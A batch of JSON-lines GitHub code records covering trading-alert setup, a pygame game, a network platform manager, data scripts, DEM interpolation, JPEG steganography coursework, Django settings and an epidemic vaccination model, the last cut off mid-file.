+{"seq_id":"33922375010","text":"import os\n\nfrom loguru import logger\nfrom aio_binance.futures.usdt import Client\nfrom unicorn_binance_rest_api import BinanceRestApiManager\nfrom unicorn_binance_websocket_api import BinanceWebSocketApiManager\n\nBINANCE_API_CLIENT = BinanceRestApiManager(exchange=\"binance.com-futures\")\nAIO_BINANCE_API_CLIENT = Client(show_limit_usage=True)\nBINANCE_WEBSOCKET_MANAGER = BinanceWebSocketApiManager(exchange=\"binance.com-futures\")\nKLINES_DATA = {}\n\nFIRST_KLINE_STREAM_ID = \"\"\nSECOND_KLINE_STREAM_ID = \"\"\n\nlog_folder = \"./logs\"\nos.makedirs(log_folder, exist_ok=True)\n\nlogger.add(f\"{log_folder}/file_{{time:DD-MM}}_{{time:HH-mm}}.log\", rotation=\"100 MB\", retention=\"1 day\",\n encoding='utf-8')\n\n__all__ = [\n 'BINANCE_API_CLIENT', 'BINANCE_WEBSOCKET_MANAGER',\n 'FIRST_KLINE_STREAM_ID', 'SECOND_KLINE_STREAM_ID',\n 'KLINES_DATA', 'AIO_BINANCE_API_CLIENT',\n]","repo_name":"nastiakostenyuk/alert_server_v1","sub_path":"loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"36751184486","text":"import sys\r\nimport pygame\r\nfrom bullet import Bullet\r\nfrom alien import Alien\r\nfrom time import sleep\r\nimport random\r\n\r\n\r\n# 响应按键函数\r\ndef check_keydown_events(event, ai_settings, screen, ship, bullets):\r\n if event.key == pygame.K_RIGHT:\r\n ship.moving_right = True\r\n elif event.key == pygame.K_LEFT:\r\n ship.moving_left = True\r\n elif event.key == pygame.K_SPACE:\r\n fire_bullets(ai_settings, screen, ship, bullets)\r\n elif event.key == pygame.K_q:\r\n sys.exit() # 快捷退出\r\n\r\n\r\ndef check_keyup_events(event, ship):\r\n if event.key == pygame.K_RIGHT:\r\n ship.moving_right = False\r\n elif event.key == pygame.K_LEFT:\r\n ship.moving_left = False\r\n\r\n\r\ndef check_events(ai_settings, screen, ship, bullets):\r\n for event in pygame.event.get():\r\n # 监听键盘和鼠标事件\r\n if event.type == pygame.QUIT:\r\n sys.exit()\r\n elif event.type == pygame.KEYDOWN: # 上下左右移动\r\n check_keydown_events(event, ai_settings, screen, ship, bullets)\r\n elif event.type == pygame.KEYUP:\r\n check_keyup_events(event, ship)\r\n\r\n\r\ndef update_screen(ai_settings, screen, ship, aliens, bullets):\r\n screen.fill(ai_settings.bg_color) # 每次循环时均重新绘制屏幕\r\n for bullet in bullets: # 重新绘制每颗子弹\r\n bullet.draw_bullet()\r\n ship.blitme() # 每次循环时重新绘制飞船\r\n aliens.draw(screen)\r\n pygame.display.flip() # 让绘制屏幕可见\r\n\r\n\r\ndef update_bullets(aliens, bullets):\r\n bullets.update()\r\n # 删除子弹\r\n for bullet in bullets.copy():\r\n if bullet.rect.bottom <= 0:\r\n bullets.remove(bullet)\r\n pygame.sprite.groupcollide(bullets, aliens, True, True)\r\n\r\n\r\ndef fire_bullets(ai_settings, screen, ship, bullets):\r\n # 限制屏幕上最多子弹数量\r\n if len(bullets) < ai_settings.bullets_allowed:\r\n # 创建子弹\r\n new_bullet = Bullet(ai_settings, screen, ship)\r\n bullets.add(new_bullet)\r\n\r\n\r\ndef check_alien_num(ai_settings, screen, ship, aliens, bullets):\r\n if len(aliens) == 0:\r\n # 若外星人均消灭,重新创建外星人\r\n bullets.empty()\r\n create_fleet(ai_settings, screen, ship, aliens)\r\n\r\n\r\ndef create_fleet(ai_settings, screen, ship, aliens):\r\n alien = Alien(ai_settings, screen)\r\n alien_width = alien.rect.width\r\n number_aliens_x = get_number_aliens_x(ai_settings, alien_width)\r\n number_rows = get_number_rows(ai_settings, ship.rect.height, alien.rect.height)\r\n\r\n for row_number in range(number_rows):\r\n for alien_number in range(number_aliens_x):\r\n if 
random.random() >= 0.5:\r\n create_alien(ai_settings, screen, aliens, alien_number, alien_width, row_number)\r\n\r\n\r\ndef get_number_aliens_x(ai_settings, alien_width):\r\n # 计算一行可以放置外星人的宽度\r\n available_space_x = ai_settings.screen_width - 2 * alien_width\r\n # 计算一行可以放置外星人的个数\r\n number_aliens_x = int(available_space_x / (1.5 * alien_width))\r\n return number_aliens_x\r\n\r\n\r\ndef create_alien(ai_settings, screen, aliens, alien_number, alien_width, row_number):\r\n alien = Alien(ai_settings, screen)\r\n alien.x = alien_width + 1.5 * alien_width * alien_number\r\n alien.rect.x = alien.x\r\n alien.y = alien.rect.height / 2 + 1.5 * alien.rect.height * row_number\r\n alien.rect.y = alien.y\r\n aliens.add(alien)\r\n\r\n\r\n# 计算容纳多少行外星人\r\ndef get_number_rows(ai_settings, ship_height, alien_height):\r\n available_space_y = ai_settings.screen_height - (4.5 * alien_height) - ship_height\r\n number_rows = int(available_space_y / (1.5 * alien_height))\r\n return number_rows\r\n\r\n\r\ndef update_aliens(ai_settings, stats, screen, ship, aliens, bullets):\r\n for alien in aliens.sprites():\r\n alien.y += ai_settings.fleet_drop_speed\r\n alien.rect.y = alien.y\r\n if pygame.sprite.spritecollideany(ship, aliens):\r\n ship_hit(ai_settings, stats, screen, ship, aliens, bullets)\r\n check_aliens_bottom(ai_settings, stats, screen, ship, aliens, bullets)\r\n check_alien_num(ai_settings, screen, ship, aliens, bullets)\r\n check_fleet_edges(ai_settings, aliens)\r\n aliens.update()\r\n # 对编组update,相当于对每个外星人update\r\n # 检查外星人与飞船的碰撞\r\n\r\n\r\ndef check_fleet_edges(ai_settings, aliens):\r\n for alien in aliens.sprites():\r\n if alien.check_edges():\r\n ai_settings.fleet_direction *= -1\r\n break\r\n\r\n\r\ndef ship_hit(ai_settings, stats, screen, ship, aliens, bullets):\r\n if stats.ship_left > 0:\r\n stats.ship_left -= 1\r\n aliens.empty()\r\n bullets.empty()\r\n # 重建飞船\r\n ship.center_ship()\r\n sleep(0.5)\r\n else:\r\n stats.game_active = False\r\n\r\n\r\ndef check_aliens_bottom(ai_settings, stats, screen, ship, aliens, bullets):\r\n screen_rect = screen.get_rect()\r\n for alien in aliens.sprites():\r\n if alien.rect.bottom >= screen_rect.bottom:\r\n aliens.remove(alien)\r\n\r\n\r\n\r\n","repo_name":"cuuuute/Alien-Gaming","sub_path":"Alien_Gaming_1107/game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":5075,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"74038898669","text":"from twisted.internet.endpoints import TCP4ServerEndpoint\nfrom twisted.internet import reactor\nfrom MessageManagers.MessageDispatcher import MessageDispatcherFactory\nfrom MessageManagers.SendMessage import MessageSenderFactory\nfrom CommandMessageGenerators.MessageGenerator import StringMessageGenerator\nfrom CommandMessageGenerators.MessageRepeat import MsgMonitor\nfrom CommandMessageGenerators.ExpMessageGenerator import ReceiveExpNode\nfrom Utilities.Const import *\nfrom Utilities.FileInputTokenize import ArgFIP\nfrom Utilities.FileUtil import expprint, setFileName, OUTFOLDER, getDFilePath, getPFilePath\nimport threading\nimport time\nimport sys\nimport uuid\n\nclass outgoer():\n def __init__(self, ip, port, fact):\n self.ip = ip\n self.port = port\n self.fact = fact\n\n def call(self):\n reactor.connectTCP(self.ip, self.port, self.fact)\n\nclass PlatformManager():\n def __init__(self, in_my_IP, in_my_Port, location):\n self.IP = in_my_IP\n self.Port = in_my_Port\n self.reactorFileConfirmers = []\n self.msgmon = MsgMonitor()\n 
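# a fresh uuid identifies this run; per-run log files are keyed by it\n        # (see setFileName just below, and storeLog / compilelogs further down)\n        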
self.idval = str(uuid.uuid4())\n setFileName(self.idval)\n self.templogfilenames = []\n self.location = location\n\n def ManagerThreadRun(self):\n dbgprint(\"bad way\")\n raise NotImplementedError(\"Abstract method\")\n\n def StartAll(self):\n self.StartServer()\n self.StartManager()\n def StartServer(self):\n #from Utilities.Const import * ##\n self.serverThread = threading.Thread(target=self.ServerThreadRun)\n self.serverThread.start()\n def StartManager(self):\n #from Utilities.Const import * ##\n dbgprint(\"starting mngr\")\n self.managerThread = threading.Thread(target=self.ManagerThreadRun)\n self.managerThread.start()\n\n def SafeStopServer(self):\n dbgprint(\"SafeStopCalled\")\n reactor.callFromThread(reactor.stop)\n self.msgmon.terminate()\n\n def ServerThreadRun(self):\n\n endpoint = TCP4ServerEndpoint(reactor, self.Port)\n endpoint.listen(MessageDispatcherFactory(self))\n dbgprint(\"server starting...\")\n reactor.run(installSignalHandlers=0)\n\n def ReactorReceiverAdd(self, filerec):\n dbgprint(\"added filerec\")\n self.reactorFileConfirmers.append(filerec)\n\n def ReactorFileSent(self, filename, transp):\n dbgprint(\"Reactor File Sent\")\n self.reactorFileConfirmers[:] = [x for x in self.reactorFileConfirmers if x.FileResponded(filename, transp)]\n\n def storeLog(self, vals):\n afilename = str(uuid.uuid4())\n v = vals.replace(\"\\t\", \"\\n\") \n if(afilename in self.templogfilenames):\n expprint(\"BADFILENAME!!\")\n self.templogfilenames.append(afilename)\n with open(afilename, 'w') as afile:\n afile.write(v)\n\n def compilelogs(self):\n expprint(\"Compiling \" + str(len(self.templogfilenames)) + \" logs\\n\")\n for filename in self.templogfilenames:\n if(self.templogfilenames.count(filename) > 1):\n expprint(\"found dup\\n\");\n for filename in self.templogfilenames:\n with open(filename, 'r') as afile:\n for line in afile:\n expprint(line +\"\\n\")\n os.remove(filename)\n dbgprint(\"Logs Compiled To \"+OUTFOLDER+str(self.idval))\n\n def dumpLogToStdOut(self):\n filename = OUTFOLDER+\"/\"+str(self.idval)\n with open(filename, 'r') as afile:\n for line in afile:\n print (line + \"\\n\") ##\n\n def getPFileName(self):\n return getPFilePath()\n\n def getDFileName(self):\n return getDFilePath()\n","repo_name":"Shifat11420/CloudPlatform","sub_path":"Platformv5/Platform/PlatformManager.py","file_name":"PlatformManager.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21112038120","text":"import requests\r\nfrom collections import defaultdict\r\n\r\n# loadData: takes a URL and headers parameters for getting info from the URL endpoint\r\n# parameter URL: this is the endpoint where the data is located in JSON format\r\n# parameter headers: There is no need of headers for accessing this data, so it will be empty\r\ndef loadData(URL,header) :\r\n # making the info request to the endPoint\r\n URLrequest=requests.get(URL,headers=header)\r\n #storing the information to \"result\" variable\r\n result=URLrequest.json()\r\n return result\r\n# takes the input from console of height\r\ndef getInput():\r\n while True:\r\n try :\r\n result = int(input(\"Introduce height in inches adds up to:\"))\r\n break\r\n except ValueError:\r\n print(\"Please introduce a number\")\r\n return result\r\n\r\n# parameters:\r\n# data: Dictionary with players Info\r\n# totalHeight: the total height of the players' pair\r\ndef createHeightDictionary(data, totalHeight):\r\n # create an empty dictionary with 
heights as keys and lists of player names as values\r\n    dictPairs = defaultdict(list)\r\n    # debug: show the container type\r\n    print(type(dictPairs))\r\n    for player in data:\r\n        try:\r\n            # takes playerHeight of each player record and validates data quality\r\n            playerHeight = int(player['h_in'])\r\n        except ValueError:\r\n            print(\"Height is not an integer value on player:\" + player['first_name'] + \" \" + player['last_name'])\r\n            continue # skip the record: playerHeight would otherwise be stale or undefined\r\n\r\n        # add player to the dictionary\r\n        dictPairs[playerHeight].append(player['first_name'] + \" \" + player['last_name'])\r\n        # print(dictPairs)\r\n\r\n    return dictPairs\r\n# program starting point\r\ntotalHeight = getInput()\r\n \r\n# url hardcoded\r\nurl='https://mach-eight.uc.r.appspot.com'\r\n# load data into result (as a dictionary) variable from url\r\nDataresult=loadData(url,{})\r\nprint(type(Dataresult))\r\nfor data in Dataresult['values'] :\r\n    print(data)\t\t\r\n\r\nplayersHeight = createHeightDictionary(Dataresult['values'],totalHeight)\r\nprint(playersHeight)\r\n# search for pairs by checking each height against its complement\r\nprint(\"The pairs of basketball players that add up to [\"+ str(totalHeight)+\"] inches are:\")\r\nfor height in playersHeight:\r\n    # print(height)\r\n    if totalHeight - height in playersHeight:\r\n        for otherPlayer in playersHeight[totalHeight - height] :\r\n            for player in playersHeight[height]:\r\n                #print(\"player:\"+player)\r\n                if player < otherPlayer:\r\n                    print(\"[\"+player + \" - \" + otherPlayer+\"]\")\r\n    ","repo_name":"jriosfer/Playerspairs","sub_path":"getPairs.py","file_name":"getPairs.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"33882337144","text":"from aiogram.types import BotCommand\n\nBOT_COMMAND_LIST = (\n    (\"start\", \"Start the bot\"),\n    (\"suggest\", \"Suggest a password\"),\n    (\"logout\", \"Log out\"),\n    (\"help\", \"Help\"),\n    (\"about\", \"About the bot\"),\n)\n\nBOT_COMMANDS = [\n    BotCommand(command=name, description=desc) for name, desc in BOT_COMMAND_LIST\n]\n\nBOT_COMMANDS_STR = \"\\n\".join(\"/\" + (\" - \".join(cmd)) for cmd in BOT_COMMAND_LIST)\n","repo_name":"everysoftware/secrets","sub_path":"bot/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"40316526464","text":"# declare a dictionary\nd={'과목1':'자료구조','과목2':'컴논개'}\n\n# insertion\nd['과목3']='데이터구조'\nd['과목4']='컴개실'\nprint(d)\n\n# ADT usage examples\nGet=d.get('과목1')\nShow=d.values()\nKeysList=list(d.keys())\nValuesList=list(d.values())\nTuple_d=d.items()\nprint(f' Get={Get} \\n Show={Show} \\n KeysList={KeysList} \\n ValuesList={ValuesList} \\n Tuple_d={Tuple_d}')\n\nprint()\n# declare a set\ns={0,1,2}\n\ns.add(4)\ns.update([10,6])\ns.remove(0)\nlength=len(s)\n\nt={0,1,2,20}\nUnion=s.union(t)\nIntersection=s.intersection(t)\nDifference=s.difference(t)\n\nprint(f'Set : {s} \\nUnion : {Union} \\nIntersection : {Intersection} \\nDifference : {Difference}')\n\n\n#comprehension\na = []\nfor x in range(31):\n    if x % 3 ==0:\n        a.append(x)\n\n# a=[x for x in range(31) if x%3==0]\n\n\ndef add(*args):\n    sum=0\n    for x in args:\n        sum+=x\n    return sum\nprint(add(3,4,5,6))\n\n\ndef say_myself(name, old, man=True):\n    print(\"My name is %s\" %name)\n    print(\"I am %d years old.\" %old)\n    if man:\n        print(\"I am a man.\")\n    else:\n        print(\"I am a woman.\")\n\n\ndef increase1(x):\n    x +=1\n\nx=10\nincrease1(x)\nprint(x)\n\ns=[]\ns.append(3)\ns.extend('4')\ns.extend({5:6, 7:8})\nprint(s)\n\naa=s.copy()\nprint(aa,\"\\n\")\nstring= \"hello 
world\"\ntu=(1,2,3,4)\nprint(max(string))\nprint(max(tu))","repo_name":"Againyunn/Python-Study","sub_path":"DataStructure/수업내용/PythonReview/자료형 연습.py","file_name":"자료형 연습.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15277613728","text":"#!/usr/bin/env python\n\n# inst: university of bristol\n# auth: jeison sosa\n# mail: j.sosa@bristol.ac.uk / sosa.jeison@gmail.com\n\nfrom sys import exit\nimport subprocess\nimport numpy as np\nimport gdalutils as gu\n\nos = 'osx'\nvoid_demf = 'lidar_england_50m.tif'\nfill_demf = 'OS_terrain_50.tif'\nnodata = -9999 # non data value in both datasets\n\n# Calculate delta surface with voids\ndef step_01():\n\n geo = gu.get_geo(void_demf)\n void_dem = gu.get_data(void_demf)\n fill_dem = gu.get_data(fill_demf)\n delta_surf = void_dem - fill_dem\n\n delta_surf[(delta_surf>=8000) | (delta_surf<=-8000)] = nodata\n delta_surf[delta_surf==0] = nodata\n\n gu.write_raster(delta_surf,'delta_surf_wt_voids.tif',geo,'Float64',nodata)\n\n# Create list of source points to interpolate\ndef step_02():\n\n subprocess.call(['gdal_translate','-of','XYZ','delta_surf_wt_voids.tif','delta_surf_wt_voids.xyz'])\n subprocess.call(['sed','s/ /,/g','delta_surf_wt_voids.xyz'],stdout=open('delta_surf_wt_voids.csv','w'))\n if os == 'osx':\n subprocess.call(['sed','-i','','/-9999/d','delta_surf_wt_voids.csv'])\n elif os == 'linux':\n subprocess.call(['sed','-i','/-9999/d','delta_surf_wt_voids.csv'])\n else:\n print('OS not identified')\n exit(0)\n\n f = open('delta_surf_wt_voids.vrt','w')\n f.write(''+'\\n')\n f.write(' '+'\\n')\n f.write(' delta_surf_wt_voids.csv'+'\\n')\n f.write(' wkbPoint'+'\\n')\n f.write(' '+'\\n')\n f.write(' '+'\\n')\n f.write(''+'\\n')\n f.close()\n\n# Interpolation\ndef step_03():\n\n geo = gu.get_geo(void_demf)\n nx = geo[4]\n ny = geo[5]\n xmin = geo[0]\n xmax = geo[2]\n ymin = geo[1]\n ymax = geo[3]\n\n subprocess.call(['gdal_grid','--config','GDAL_NUM_THREADS','ALL_CPUS',\n '-a','invdist',\n '-of','GTiff',\n '-ot','Float64',\n '-txe', str(xmin), str(xmax),\n '-tye', str(ymin), str(ymax),\n '-outsize', str(nx), str(ny),\n '-l','delta_surf_wt_voids',\n 'delta_surf_wt_voids.vrt','delta_surf_interp.tif'])\n\n# Get final raster\ndef step_04():\n\n A = gu.get_data('delta_surf_interp.tif')\n B = gu.get_data(fill_demf)\n C = gu.get_data(void_demf)\n geo = gu.get_geo(void_demf)\n mysum = A+B\n final = np.where(C==nodata,mysum,C)\n \n final[(final>=8000) | (final<=-8000)] = nodata\n gu.write_raster(final,'dem.tif',geo,'Float64',nodata)\n\n# Running the program\ndef main():\n step_01()\n step_02()\n step_03()\n step_04()\nmain()\n","repo_name":"jsosa/delta_surf_method","sub_path":"delta_surface_method.py","file_name":"delta_surface_method.py","file_ext":"py","file_size_in_byte":2847,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"17533590366","text":"from classy_blocks.construct import edges\nfrom classy_blocks.construct.flat.face import Face\nfrom classy_blocks.construct.operations.loft import Loft\nfrom classy_blocks.types import VectorType\n\n\nclass Revolve(Loft):\n \"\"\"Takes a Face and revolves it by angle around axis;\n axis can be translated so that it goes through desired origin.\n\n Angle is given in radians,\n revolve is in positive sense (counter-clockwise - right hand rule)\"\"\"\n\n def __init__(self, base: Face, angle: float, axis: VectorType, origin: VectorType):\n self.base = base\n 
self.angle = angle\n        self.axis = axis\n        self.origin = origin\n\n        bottom_face = base\n        top_face = base.copy().rotate(angle, axis, origin)\n\n        super().__init__(bottom_face, top_face)\n\n        # there are 4 side edges: the simplest is to use 'axis and angle'\n        for i in range(4):\n            self.add_side_edge(i, edges.Angle(self.angle, self.axis))\n","repo_name":"damogranlabs/classy_blocks","sub_path":"src/classy_blocks/construct/operations/revolve.py","file_name":"revolve.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"38"}
+{"seq_id":"71622050671","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Feb 25 14:34:05 2021\r\n\r\n@author: tjoeun\r\n\"\"\"\r\ndef fibo_print(n):\r\n    'print the Fibonacci sequence below n'\r\n    for i in fibo_return(n):\r\n        print(i, end=' ')\r\n    print()\r\n    \r\n\r\ndef fibo_return(n):\r\n    'return the list of Fibonacci numbers below n'\r\n    result = []\r\n    a,b=0,1 \r\n    while(a
Đọc cover img file\n # YOUR CODE HERE\n\n cover_img = Image.open(cover_img_file)\n cover_pixels = np.array(cover_img,dtype=int)\n width, height = cover_img.size\n max_bits_per_block = 26\n \n \n # II. Đọc msg file, chuyển msg thành msg bits, kiểm xem có đủ chỗ nhúng không, thêm 100... vào msg bits\n # YOUR CODE HERE\n \n # Đọc msg file\n with open(msg_file, 'r') as f:\n msg = f.read()\n msg_bits = bitarray()\n msg_bits.frombytes(msg.encode('utf-8'))\n \n # Kiểm xem có nhúng được không?\n capacity = max_bits_per_block*(cover_pixels.size//64)\n if len(msg_bits) + 1 > capacity:\n return False\n\n # Thêm '100...' vào msg bits\n msg_bits.extend('1' + '0' * (capacity - len(msg_bits) - 1))\n\n # III. Nén jpeg, trong quá trình nén thực hiện nhúng msg bits\n jpeg_bytes = bytearray()\n jpeg_bytes.extend(get_header(height, width, quant_table))\n huf = Huffman()\n \n # Lần lượt duyệt các khối ảnh 8x8 (theo thứ tự từ trái qua phải, từ trên xuống dưới)\n # Với mỗi khối:\n # (1) Trừ 128 rồi tính các hệ số DCT\n # (2) Tính các hệ số quantized DCT\n # (3) Nhúng msg bits vào các hệ số quantized DCT\n # (4) Nén các hệ số quantized DCT bằng thuật toán nén Huffman\n # Để nén dùng câu lệnh `huf.encode_block(quant_dct_coefs, length)`\n # Trong đó: \n # - `quant_dct_coefs` là mảng 1 chiều các hệ số quantized DCT \n # (có được bằng cách duyệt mảng 2 chiều theo thứ tự dích dắc:\n # đầu tiên, kéo mảng 2 chiều thành mảng một chiều, \n # rồi duyệt mảng một chiều này theo mảng chỉ số `constants.zz` đã được định nghĩa sẵn cho bạn)\n # - `length` là số lượng phần tử của mảng `quant_dct_coefs` tính\n # từ phần tử đầu cho đến phần tử khác 0 cuối cùng \n # (lưu ý: có thể xảy ra trường hợp tất cả phần tử đều bằng 0)\n # YOUR CODE HERE\n \n k = 0 #duyệt từng bits\n\n #vị trí nhúng sau khi chuyển về mảng một chiều\n embed_index = [\n 4 , 5 , 6 , 7 ,\n 11, 12, 13, 14,\n 18, 19, 20, 21,\n 25, 26, 27, 28,\n 32, 33, 34, 35,\n 40, 41, 42,\n 48, 49,\n 56\n ]\n\n # cover_pixels.size = 8*8*blocks \n # chia ảnh thành các khối 8x8\n for r in range(0,cover_pixels.shape[0] - 8 + 1, 8):\n for c in range(0,cover_pixels.shape[1] - 8 + 1, 8):\n block = cover_pixels[r:r+8,c:c+8]\n # (1) Trừ 128 rồi tính các hệ số DCT\n dct = dct2(block - 128)\n # (2) Tính các hệ số quantized DCT\n quantized = np.array(np.round(dct / quant_table), dtype=int)\n # (3) Nhúng msg bits vào các hệ số quantized DCT\n # Đưa về mảng 1 chiều\n quantized = quantized.flatten()\n # Nhúng msg_bits\n\n for idx in embed_index:\n quantized[idx] = ((quantized[idx]>>1<<1) | int(msg_bits[k]))\n k += 1\n \n \n # (4) Nén các hệ số quantized DCT bằng thuật toán nén Huffman\n # duyệt theo dạng zig-zag thành từng block rồi thêm block vào quant_dct_coefs\n \n quant_dct_coefs = []\n for i in constants.zz:\n quant_dct_coefs.append(quantized[i])\n\n try:\n # Lấy số lượng phần tử của mảng `quant_dct_coefs` tính từ phần tử đầu cho đến phần tử khác 0 cuối cùng \n length = np.max(np.nonzero(quant_dct_coefs)) + 1\n huf.encode_block(quant_dct_coefs, length)\n except:\n pass\n \n \n # Kết thúc encode và lấy buffer cho vào jpeg_bytes\n jpeg_bytes.extend(huf.end_and_get_buffer())\n jpeg_bytes.extend(struct.pack(\">H\", 0xFFD9)) # EOI marker\n \n\n # IV. 
Ghi kết quả nén jpeg xuống file\n with open(stego_img_file, 'wb') as f:\n f.write(jpeg_bytes)\n\n return True\n\n# TEST\nquant_table = np.array([\n 16, 11, 10, 16, 1, 1, 1, 1,\n 12, 12, 14, 1, 1, 1, 1, 55,\n 14, 13, 1, 1, 1, 1, 69, 56,\n 14, 1, 1, 1, 1, 87, 80, 62,\n 1, 1, 1, 1, 68, 109, 103, 77,\n 1, 1, 1, 64, 81, 104, 113, 92,\n 1, 1, 78, 87, 103, 121, 120, 101,\n 1, 92, 95, 98, 112, 100, 103, 99\n]).reshape(8, 8)\n# result = embed('msg2.txt', 'cover.bmp', quant_table, 'stego.jpg')\n# assert result == False\n\n# TEST\nresult = embed('msg.txt', 'cover.bmp', quant_table, 'stego.jpg')\nassert result == True\n\n# assert np.all(np.array(Image.open('stego.jpg')) == np.array(Image.open('correct_stego.jpg')))\n\n\na = np.array(Image.open('stego.jpg'))\nb = np.array(Image.open('correct_stego.jpg'))\n\nwith open('arr.txt','w') as f:\n for i in range(a.shape[0]):\n for j in range(a.shape[1]):\n f.write(str(a[i,j]) + ' ')\n f.write('\\n')\nwith open('arr2.txt','w') as f:\n for i in range(b.shape[0]):\n for j in range(b.shape[1]):\n f.write(str(b[i,j]) + ' ')\n f.write('\\n')\n\n\n# print(a)\n# print(b)","repo_name":"trinhvanminh/An-Du-Lieu","sub_path":"Bai Tap Da Nop/BT03/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":9481,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"40247697598","text":"# coding: utf-8\n\nfrom .base import *\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n\nINSTALLED_APPS = INSTALLED_APPS + ('debug_toolbar', )\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'simple': {\n 'format': '%(levelname)s %(message)s'\n },\n },\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'simple'\n },\n },\n 'loggers': {\n 'django': {\n 'handlers': ['console'],\n 'propagate': True,\n 'level': 'INFO',\n },\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\n\n","repo_name":"hacklabr/mapasculturais-openid","sub_path":"iddacultura/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"34967534100","text":"import time\nimport numpy as np\nimport pandas as pd\nfrom policies.policy import Policy\nfrom utils.history_utils import TimeSeries\nimport logging\n\nfrom models.agent_based_network_model import STATES\nfrom utils.config_utils import ConfigFile\n\nlogging.basicConfig(level=logging.DEBUG)\n\n\ndef _process_calendar(filename):\n df = pd.read_csv(filename)\n return (\n dict(zip(df[\"T\"], df[\"workers\"].astype(int))),\n dict(zip(df[\"T\"], df[\"elderly\"].astype(int))),\n )\n\n\nclass Vaccination(Policy):\n\n \"\"\"\n Vaccination Policy.\n \"\"\"\n\n def __init__(self, graph, model, config_file=None):\n super().__init__(graph, model)\n\n self.first_day = True\n self.stopped = False\n self.delay = None\n\n # -1 .. 
not vaccinated\n        # >= 0 days from vaccination\n        self.vaccinated = np.full(\n            self.graph.num_nodes, fill_value=-1, dtype=int)\n        self.nodes = np.arange(self.graph.num_nodes)\n        self.days_in_E = np.zeros(self.graph.num_nodes, dtype=int)\n        self.target_for_R = np.zeros(\n            self.graph.num_nodes, dtype=bool) # auxiliary var\n\n        # statistics\n        self.stat_moved_to_R = TimeSeries(401, dtype=int)\n\n        if config_file:\n            cf = ConfigFile()\n            cf.load(config_file)\n            calendar_filename = cf.section_as_dict(\n                \"CALENDAR\").get(\"calendar_filename\", None)\n            if calendar_filename is None:\n                # raising a plain string is a TypeError in Python 3; raise a real exception\n                raise ValueError(\"Missing calendar filename in vaccination policy config file.\")\n            self.workers_calendar, self.elderly_calendar = _process_calendar(\n                calendar_filename)\n            self.delay = cf.section_as_dict(\"CALENDAR\").get(\"delay\", None)\n\n            self.first_shot_coef = cf.section_as_dict(\"EFFECT\")[\"first_shot\"]\n            self.second_shot_coef = cf.section_as_dict(\"EFFECT\")[\"second_shot\"]\n        else:\n            raise ValueError(\"Vaccination policy requires config file.\")\n\n        self.old_to_vaccinate = list(np.argsort(self.graph.nodes_age))\n        # self.index_to_go = len(self.sort_indicies)-1\n\n        worker_id = self.graph.cat_table[\"ecactivity\"].index(\"working\")\n        self.workers_to_vaccinate = list(\n            self.nodes[self.graph.nodes_ecactivity == worker_id])\n        # print(self.workers_to_vaccinate)\n        # exit()\n\n    def first_day_setup(self):\n        pass\n\n    def stop(self):\n        \"\"\" just finish necessary, but do nothing new \"\"\"\n        self.stopped = True\n\n    def move_to_S(self):\n        # take those who are first day E (are E AND are E the first day)\n        nodes_first_E = (self.model.memberships[STATES.E] == 1).ravel()\n        self.days_in_E[nodes_first_E] += 1\n        nodes_first_E = np.logical_and(\n            nodes_first_E,\n            self.days_in_E == 1\n        )\n\n        if nodes_first_E.sum() == 0:\n            return\n\n        # By 14 days after the first shot, the effect is zero (i.e. an infected\n        # individual becomes exposed and later symptomatic or asymptomatic as if\n        # not vaccinated).\n        # Between 14 and 20 days after the first shot, those who are infected\n        # (heading to the E compartment) and are \"intended\" to be asymptomatic\n        # (further go to Ia; it is no harm to assume this decision is made in\n        # forward) become recovered with probability 0.29 instead of entering\n        # the E compartment. Those intended to be symptomatic (further go to Ip)\n        # become recovered with probability 0.46.\n        # 21 days or more after the first shot, this probability of \"recovery\"\n        # is 0.52 for asymptomatic and 0.6 for symptomatic.\n        # 7 days after the second shot or later, the probability of \"recovery\"\n        # is 0.9 for asymptomatic and 0.92 for symptomatic.\n\n        # divide nodes_first_E to asymptomatic candidates and symptomatic candidates\n        # assert np.all(np.logical_or(\n        #     self.model.state_to_go[nodes_first_E, 0] == STATES.I_n,\n        #     self.model.state_to_go[nodes_first_E, 0] == STATES.I_a\n        # )), \"inconsistent state_to_go\"\n\n        self.target_for_R.fill(0)\n\n        def decide_move_to_R(selected, prob):\n            n = len(selected)\n            print(f\"generating {n} randoms\")\n            if n > 0:\n                r = np.random.rand(n)\n                self.target_for_R[selected] = r < prob\n\n        # 14 - 20 days: 0.29 